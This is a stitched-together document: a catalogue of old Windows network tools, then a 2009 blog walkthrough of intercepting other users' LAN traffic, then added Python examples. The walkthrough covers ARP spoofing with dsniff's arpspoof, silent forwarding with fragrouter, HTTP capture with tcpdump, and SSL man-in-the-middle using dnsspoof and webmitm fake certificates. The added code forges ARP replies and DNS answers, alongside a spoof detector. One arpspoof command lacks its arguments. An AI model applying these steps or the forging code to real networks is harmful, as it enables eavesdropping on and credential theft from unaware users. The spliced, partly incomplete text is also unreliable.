    Protocol analyser focusing on SS7oIP from Utel Systems. Protocols like ISUP (ITU, ANSI, UK), SCCP, TCAP, MAP, INAP, CAP/CAMEL, SMS, IS-41, Megaco/H.248, MGCP, SIP, SDP, RTP, SIP-T (ITU, ANSI, UK, DPNSS/DASS2), SCTP, M2PA, M2UA, M3UA, SUA, IAU, DUA, V5UA, TCP, UDP, IP and others are decoded in detail by this product.
  • STINGA SIP Simulator
    Protocol simulator for SIP and SDP protocol testing.
  • SuperAgent
    This product from NetQoS analyzes application response times without the need to deploy client-side agents.
  • TCPKillNT
    TCPKillNT is a TCP connection "Reset" utility for Microsoft Windows NT platforms. It has the ability to send RST packets to already established TCP connections. Quite deadly on a LAN. It is very useful for IDS kind of products which need to terminate a TCP session.
  • ting
    ting is an OSI layer 4 connectivity assurance tool. It supports UDP multicast, unicast and TCP/IP. It makes use of the packet capture library to perform passive multicast monitoring.
  • TJesNetMonitor
    Borland C++ Builder wrapper for WinPcap. Comes with a sample application.
  • TraceDet
    TraceDet is a traceroute detector for Windows NT. Basically, it detects and logs when somebody traceroutes to your host. The idea is that when somebody traces to your host, you receive IP packets with a TTL value equal to 1, so TraceDet looks out for such packets.
  • tracetcp
    tracetcp is a command line traceroute utility for WIN32 that uses TCP SYN packets rather than ICMP/UDP packets that the usual implementations use, thus bypassing gateways that block traditional traceroute packets.
  • TrafficStatistic
    MZL & Novatech TrafficStatistic shows the consumed traffic volume conveniently in the system tray.
  • TrafficWatcher
    A tool to measure network traffic by service (FTP, mail, news, web, UDP etc)
  • TrafMeter
    TrafMeter is a utility for accounting and real-time monitoring of Internet traffic to and from a local network. It includes a flexible filter engine, extensive logging facilities and a friendly user interface.
  • uIP
    uIP is an implementation of the TCP/IP protocol stack intended for small 8-bit and 16-bit microcontrollers. It provides the necessary protocols for Internet communication, with a very small code footprint and RAM requirements - the uIP code size is on the order of a few kilobytes and RAM usage is on the order of a few hundred bytes.
  • Unsniff Network Analyzer
    Unsniff features brand new visualization of packet data, advanced reassembly capabilities, full stream monitoring and several other enhancements over the current crop of network analyzers. What really sets Unsniff apart is its scripting capabilities. Unsniff allows you to write your own network analysis scripts using the Ruby scripting language. You can also write powerful protocol handlers and other types of plugins using XML and/or C++. Unsniff is even available in Japanese.
  • Url Snooper
    Url Snooper is a program written to help users locate the URLs of audio and video files so that they can be recorded.
  • VB.PCAP
    VB.PCAP is an "Open Source and completely free" packet capture library for Visual Basic (tested on VB5 and VB6, not tested on VB.NET) based on WinPcap. The library exposes a set of APIs that wrap around WinPcap using the _stdcall convention. The library is the foundation for a network analyzer in VB.
  • Viper Chat
    ViperChat is a FREE LAN chat client compatible with Vypress Chat™ protocol version 1.93. It uses UDP communication over WinPcap.
  • Warp Pipe
    Warp Pipe is free software that runs on your PC or Mac and is available for Windows, Mac OSX, Linux, and BSD operating systems. While running on your PC or Mac, Warp Pipe allows you to play LAN-enabled Nintendo GameCube games over the Internet with other GameCube gamers.
  • Watt-32
    Watt-32 is a library for writing networked TCP/IP programs in C and C++ under DOS and Windows NT.
  • WebSnurf
    Websnurf is a small application that follows a user's web surfing; that is, by running WebSnurf on your PC you can follow the web-surfing activity taking place on another PC. Obviously, the two PCs have to be on the same LAN.
  • Win32::NetPacket
    Win32::NetPacket is an Object-Oriented interface to the WinPcap packet.dll library.
  • Windows ARP Spoofer
    Windows ARP Spoofer (WinArpSpoof) scans the computers (including network devices) on the local area network, spoofs their ARP tables, and then acts as a router while pulling all LAN packets through itself.
  • Windows Toolbox
    The Windows Toolbox is a comprehensive collection of software and information for Windows - a toolbox of high quality applications and utilities for a wide array of functions, all freely re-distributable and under Free, Open Source, Freeware, Shareware or similar licences; documents on installing, configuring and maintaining Windows and various software applications, for stability, performance, usability and security.
  • Windump
    WinDump is the Windows version of the famous tcpdump Unix tool. It's developed and maintained by the WinPcap team.
  • Winfingerprint
    Winfingerprint is a Win32 Host/Network Enumeration Scanner. Winfingerprint is capable of performing SMB, TCP, UDP, ICMP, RPC, and SNMP scans.
  • WinPcapArp
    WinPcapArp is ARP client library that works on Windows OS(NT and 2000). The main purpose of this library is to get a MAC address of the target ethernet NIC with the IP address.
  • WinPcapDhcpCD
    WinPcapDhcpCD is a DHCP client demon library that works on Windows OS (NT and 2000). The purpose of this library is to get more than one IP addresses in your application program.
  • WinSniff
    WinSniff is an application for capturing packets on the network. It displays all the packets that are transmitted on the local network and gives detailed information about each header in the packet.
  • WinWhif
    WinWhif allows any PC running Windows (95, 98, NT or 2000) to record the DICOM traffic between two machines on the same network. It can be useful in diagnosing DICOM communication problems.
  • Wireshark/Ethereal
    Wireshark (formerly known as Ethereal) is the world's most popular network analyzer. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, viewing summary and detail information for each packet. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.
  • wpa_supplicant
    wpa_supplicant is a WPA Supplicant for Linux, BSD and Windows with support for WPA and WPA2 (IEEE 802.11i / RSN). It implements key negotiation with a WPA Authenticator and it controls the roaming and IEEE 802.11 authentication/association of the wlan driver.
  • YATT
    YATT is a project to replace the current proliferation of trace tools ( tcpTrace, proxyTrace, pcapTrace ), with a single extensible tracing tool. YATT features a new GUI built with WTL, complete with a Hex View mode, and currently ships with 2 Trace providers, one based on WinPCAP and one based on the W2K Raw sockets support.
  • York
    York logs the IP/FQDN addresses of all traffic. It can save sniffed HTTP and FTP files. You can also sniff for HTTP, FTP, POP3, SMTP, SMB, VNC and AIM passwords/hashes. Furthermore, you can watch the web browsing of other users: your browser will show the same pages as the selected user. A screensaver is included that shows the sniffed pictures as a slide show.

Source: http://blog.naver.com/java2core

2009.06.03 15:14

Packet sniffing with dsniff

Computers on the same network segment can sniff each other's outbound packets by ARP-spoofing the gateway's MAC address.

The dsniff toolset makes this easy.

Open three consoles and run one of the following commands in each.

1. Impersonate the gateway's address
$ sudo arpspoof -i wlan0 -t

2. Route the packets that now arrive at this machine back out to the network. (This is what keeps the person actually using the victim computer browsing the Internet exactly as before.)
$ sudo fragrouter -i wlan0 -B1

3. Capture the packets you want.
$ sudo tcpdump tcp dst port 80 -i wlan0 -s1500 -w-
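The three steps above are easier to reason about once you see what arpspoof actually puts on the wire. The following is an added example written for this page, not code from the original post or from dsniff: it builds the unsolicited ARP reply that step 1 keeps sending (the gateway's IP paired with the attacker's MAC, addressed to the target), parses such frames back, and runs the check a defender would run on the same segment, flagging any reply that rebinds an IP already on record to a different MAC. All addresses are made up and nothing here touches a real interface.

```python
"""ARP spoofing on the wire, and the check that catches it.

Added example for this page; it is not part of dsniff. Addresses below are
made up. Frames are built and parsed in memory only.
"""
import struct
from typing import Dict, List, Optional

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes(int(b, 16) for b in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac: str, sender_ip: str,
                    target_mac: str, target_ip: str) -> bytes:
    """Ethernet II header + ARP reply, 42 bytes.

    arpspoof -t <target> <gateway> sends this with sender_ip set to the
    gateway's IP and sender_mac set to the attacker's MAC, so the target's
    ARP cache entry for the gateway now points at the attacker.
    """
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, reply
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> Optional[Dict[str, object]]:
    """Return the ARP fields of an Ethernet/ARP frame, or None if it is not one."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": ip_str(frame[38:42]),
    }


def detect_arp_spoof(frames: List[bytes], pinned: Dict[str, str]) -> List[str]:
    """Flag ARP replies that rebind an IP to a MAC different from the one on record.

    `pinned` seeds the IP->MAC table (a defender would pin the gateway here);
    other IPs are learned from the first reply that mentions them.
    """
    table = dict(pinned)
    alerts = []
    for frame in frames:
        p = parse_arp(frame)
        if p is None or p["op"] != ARP_REPLY:
            continue
        known = table.get(p["sender_ip"])
        if known is None:
            table[p["sender_ip"]] = p["sender_mac"]
        elif known != p["sender_mac"]:
            alerts.append(f"{p['sender_ip']} claimed by {p['sender_mac']}, on record as {known}")
    return alerts


# Constructed sample segment: gateway, victim and attacker (made-up addresses).
GATEWAY_IP, GATEWAY_MAC = "192.168.0.1", "00:11:22:33:44:01"
VICTIM_IP, VICTIM_MAC = "192.168.0.10", "00:11:22:33:44:0a"
ATTACKER_MAC = "de:ad:be:ef:00:01"


def demo() -> List[str]:
    legit = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    spoof = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    # arpspoof repeats its reply every couple of seconds; two copies here.
    return detect_arp_spoof([legit, spoof, spoof], pinned={})


if __name__ == "__main__":
    for line in demo():
        print("ALERT:", line)
```

The detector keys on the first MAC seen for each IP, or on a pinned entry such as the real gateway MAC, which is exactly the binding arpspoof has to overwrite; the same rule is what arpwatch reports on and what switch-side dynamic ARP inspection enforces. Note that step 2 (forwarding) is what hides the attack from the user; the ARP replies themselves are visible to anyone watching the segment.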

If SSL is in use, capturing packets this way shows nothing useful because the contents are encrypted. In that case it can still be done with a MITM (man-in-the-middle) attack.

The idea is to hand the client a fake certificate from the middle and relay the traffic to the real server while sniffing its contents. This only works when the user connects without properly checking the certificate.

If the user ignores a warning dialog like the one above, sniffing is possible. (Figure: IE6 certificate warning dialog)

Steps 1 and 2 are the same as above.

3. Spoof DNS. (Write the names to spoof in the host file.) This makes the client connect to a server you specify instead of the real one.
$ cat host
*.sample.com
$ sudo dnsspoof -f host

4. Now relay the incoming connections to the real web server.
$ sudo webmitm -dd

While relaying, webmitm decrypts the traffic that the client encrypted under the fake certificate, so everything becomes visible; toward the real web server it re-encrypts the contents under that server's legitimate certificate.
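To make step 3 concrete, here is an added example (written for this page, not dnsspoof's own code) of what dnsspoof does for a single query: it parses an A query, looks the name up in a hosts(5)-style table in which `*` is allowed in the name, and forges the response the client will accept. The hosts contents, the transaction IDs and the address 192.0.2.10 are constructed for the example, and wildcard matching is simplified to fnmatch rules, which is an assumption about dnsspoof's exact semantics rather than a statement of them. In real use the forged answer only wins if it reaches the client before the genuine resolver's reply, which is why it is run from the machine that steps 1 and 2 already placed in the path.

```python
"""A single dnsspoof-style forged answer, built by hand.

Added example for this page; not dnsspoof's own code. Hosts contents,
addresses and transaction IDs are constructed. Wildcard matching uses
fnmatch rules, an assumption rather than dnsspoof's exact semantics.
"""
import fnmatch
import struct
from typing import List, Optional, Tuple

# Constructed hosts(5)-style table in the format the post's "host" file uses.
HOSTS_FILE = """
# <ip> <name-or-pattern>
192.0.2.10   *.sample.com
192.0.2.10   sample.com
"""


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (pattern, ip) pairs; '#' comments and blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, pattern = line.split()[:2]
        entries.append((pattern.lower(), ip))
    return entries


def lookup(entries: List[Tuple[str, str]], qname: str) -> Optional[str]:
    """First table entry whose pattern matches the query name, case-insensitively."""
    for pattern, ip in entries:
        if fnmatch.fnmatchcase(qname.lower().rstrip("."), pattern):
            return ip
    return None


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode an uncompressed name starting at `off`; return (name, next offset)."""
    labels = []
    while True:
        ln = msg[off]
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), off


def build_query(txid: int, qname: str) -> bytes:
    """Standard recursive A/IN query, as a stub resolver would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    return header + encode_name(qname) + struct.pack("!HH", 1, 1)


def forge_response(query: bytes, entries: List[Tuple[str, str]], ttl: int = 60) -> Optional[bytes]:
    """Answer a matching A query with the IP from the table; None means stay silent."""
    txid, _flags, qdcount, *_ = struct.unpack("!HHHHHH", query[:12])
    if qdcount != 1:
        return None
    qname, off = decode_name(query, 12)
    qtype, qclass = struct.unpack("!HH", query[off:off + 4])
    if (qtype, qclass) != (1, 1):
        return None
    ip = lookup(entries, qname)
    if ip is None:
        return None  # not a target: let the real resolver answer
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR=1 RD=1 RA=1, one answer
    question = query[12:off + 4]  # echoed verbatim so the client matches it to its query
    rdata = bytes(int(o) for o in ip.split("."))
    # name pointer to offset 12, type A, class IN, TTL, RDLENGTH, then the address
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_answer_ip(resp: bytes) -> Tuple[int, str]:
    """Pull txid and the A record address out of a response from forge_response."""
    txid = struct.unpack("!H", resp[:2])[0]
    _, off = decode_name(resp, 12)
    off += 4                         # skip QTYPE/QCLASS
    rdata = resp[off + 12:off + 16]  # pointer(2)+type(2)+class(2)+ttl(4)+rdlen(2)
    return txid, ".".join(str(b) for b in rdata)


def demo() -> Tuple[Optional[Tuple[int, str]], Optional[bytes]]:
    entries = parse_hosts(HOSTS_FILE)
    hit = forge_response(build_query(0x1234, "www.sample.com"), entries)
    miss = forge_response(build_query(0x1235, "www.example.org"), entries)
    return (parse_answer_ip(hit) if hit else None), miss


if __name__ == "__main__":
    print(demo())
```

The forged reply copies the transaction ID and the question section from the query, which is all a pre-0x20, single-source-port stub resolver checks; that is why the post does not need anything more elaborate than `dnsspoof -f host` once the attacker is already on the path. The `None` branch matters in practice: answering names that are not in the table would break the victim's other lookups and make the attack obvious.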

